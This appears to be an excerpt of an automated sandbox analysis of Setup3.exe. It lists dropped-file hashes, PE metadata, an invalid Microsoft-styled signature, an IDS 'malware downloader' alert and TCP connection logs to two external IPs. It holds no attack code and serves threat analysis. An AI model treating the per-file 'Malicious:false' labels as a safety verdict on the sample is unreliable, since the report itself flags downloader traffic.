                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                    Malicious:false
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.421654582946078
                                    Encrypted:false
                                    SSDEEP:6144:OSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNe0uhiTw:tvloTMW+EZMM6DFyI03w
                                    MD5:42B69DA29757E0BF911B402F4633FC89
                                    SHA1:1394D2BF52DEA421165223C4734E2162FD6CEC11
                                    SHA-256:1D55755E6FA68C16085A011376AF29B5AD7DCF9EF099F8D1E91FF3A215DC2FC5
                                    SHA-512:93FAAFE5A14684463864CE6455B730D5FC1DEA307C64F5FA7E3CCAA97B4CF3968E80337C34D81D6FAC78E915D973BDB4AF0E0614A603DBDAD427DDC41577F82C
                                    Malicious:false
                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.CE..................................................................................................................................................................................................................................................................................................................................................yS.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.463769650914975
                                    TrID:
                                    • Win64 Executable Console Net Framework (206006/5) 48.58%
                                    • Win64 Executable Console (202006/5) 47.64%
                                    • Win64 Executable (generic) (12005/4) 2.83%
                                    • Generic Win/DOS Executable (2004/3) 0.47%
                                    • DOS Executable Generic (2002/1) 0.47%
                                    File name:Setup3.exe
                                    File size:1'118'952 bytes
                                    MD5:cc5be4e36eec1b0c1248d6fa623c1d74
                                    SHA1:73290347892d4261e3b037202ba42abd35895d27
                                    SHA256:4f5033142672891d1c3fb48738b521560b1f3b19f1b1bc06c3ac7d78befbc6a5
                                    SHA512:e21aa665fd523c928cb61d84d70f39cda38d6d39b6e5bb741388baeff11b73f291599786e9966fd82624d4429a7f02d25a238f7d7aaf7196b78062ca743d3fd1
                                    SSDEEP:12288:iIibKVQIsm39TiqK/VW5G+p2p2+F8xfor7T:cbKVQ/m3k//VWcx98xfi7T
                                    TLSH:9A35F05576131E0BFD6502B2D8E0B8F209FC8E6338F6859FDF916C222604BBE15598B7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...M(.f.........."...0..~............... ....@...... ....................................`................................
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x400000
                                    Entrypoint Section:
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows cui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66BE284D [Thu Aug 15 16:09:49 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:
                                    Signature Valid:false
                                    Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 16/08/2024 22:27:54 16/08/2025 22:27:54
                                    Subject Chain
                                    • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                    Version:3
                                    Thumbprint MD5:18D6FA582473B7A7E7CC55ABF3BD63C1
                                    Thumbprint SHA-1:8CE69E2A970C9BA6781D46C787DA74E168C3000A
                                    Thumbprint SHA-256:A5463A96D5FDBDFF9D9526A569CC3CA7F6EBDF766D70CFCDE9128A5BB20AA9D2
                                    Serial:46C9317A470C9A997EB3747E6ADE182D
                                    Instruction
                                    dec ebp
                                    pop edx
                                    nop
                                    add byte ptr [ebx], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x596.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x10f4880x1e60
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x7edc0x800082b7b4ca24c22488bd3f65500b1818e9False0.588714599609375data6.358471379791536IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xa0000x5960x600ef83d8e892edcf1beee7cfe694fe04edFalse0.408203125data4.034358228528137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0xa0a00x30cdata0.41923076923076924
                                    RT_MANIFEST0xa3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-18T00:08:11.141189+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349714443192.168.2.5104.20.4.235
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 18, 2024 00:08:04.055938005 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.055994034 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.056107998 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.064213037 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.064229965 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.536978006 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.537098885 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.541172981 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.541193008 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.541745901 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.650942087 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.726398945 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.768536091 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828291893 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828411102 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828468084 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.828485966 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828581095 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828639030 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.828644991 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828780890 CEST44349706104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:04.828838110 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:04.882070065 CEST49706443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:05.436064959 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.436119080 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:05.436183929 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.436494112 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.436507940 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:05.910284042 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:05.910355091 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.913207054 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.913213968 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:05.913614988 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:05.915245056 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:05.956505060 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.044558048 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.044797897 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.044959068 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.044981003 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045053005 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045135975 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045183897 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.045188904 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045226097 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.045239925 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045397043 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045490026 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045535088 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.045541048 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.045583010 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.049339056 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131175041 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131259918 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.131272078 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131302118 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131464005 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.131473064 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131563902 CEST44349707188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:06.131618977 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:06.131926060 CEST49707443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:10.558713913 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:10.558758974 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:10.558857918 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:10.559139967 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:10.559164047 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.019823074 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.029619932 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:11.029666901 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141287088 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141376972 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141434908 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:11.141465902 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141515017 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141558886 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:11.141566992 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141632080 CEST44349714104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:11.141680956 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:11.142079115 CEST49714443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:11.217910051 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.217952967 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.218112946 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.218381882 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.218394995 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.682754040 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.684287071 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.684312105 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802098036 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802376986 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802440882 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.802459002 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802576065 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802618980 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.802623987 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802783966 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802829981 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.802834034 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.802973986 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.803019047 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.803024054 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.803103924 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.803145885 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.803148985 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.854039907 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.854051113 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.888751984 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.888849974 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.888855934 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.888988972 CEST44349715188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:11.889051914 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:11.889360905 CEST49715443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:16.340759993 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.340816975 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.340924025 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.341413975 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.341428041 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.803240061 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.804627895 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.804639101 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924635887 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924679041 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924705982 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924731970 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924801111 CEST44349721104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:16.924823046 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.924866915 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.925375938 CEST49721443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:16.979969025 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:16.980004072 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:16.980081081 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:16.980345964 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:16.980360031 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.460089922 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.465071917 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.465090990 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607450008 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607677937 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607727051 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.607744932 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607831001 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607918978 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.607975006 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.607986927 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.608067036 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.608114004 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.608119965 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.608159065 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.608222008 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.612135887 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.612207890 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.612220049 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.666562080 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.666578054 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.713416100 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.897242069 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.897593021 CEST44349723188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:17.897686958 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:17.898041964 CEST49723443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:22.089623928 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.089674950 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.089775085 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.090084076 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.090100050 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.547698975 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.549376011 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.549412966 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675554991 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675585032 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675611019 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675636053 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675642014 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.675658941 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675668955 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.675738096 CEST44349728104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:22.675781965 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.676140070 CEST49728443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:22.696119070 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:22.696178913 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:22.696260929 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:22.696479082 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:22.696501970 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.161499023 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.163424015 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.163453102 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285677910 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285877943 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285914898 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285938978 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.285942078 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285969019 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.285984039 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.286016941 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.286050081 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.286051035 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.286063910 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.286096096 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.286123991 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.290920973 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.290951967 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.290963888 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.290981054 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.291018009 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.374003887 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.374265909 CEST44349729188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:08:23.374330044 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:23.374762058 CEST49729443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:08:27.935518026 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:27.935667992 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:27.935805082 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:27.939150095 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:27.939192057 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.431606054 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.433532000 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:28.433602095 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.597167015 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.597400904 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.597510099 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.597572088 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:28.597610950 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.597671986 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:28.601449966 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.601686954 CEST44349730104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:08:28.601747036 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:28.602097988 CEST49730443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:08:28.621721983 CEST49731443192.168.2.5188.114.96.3
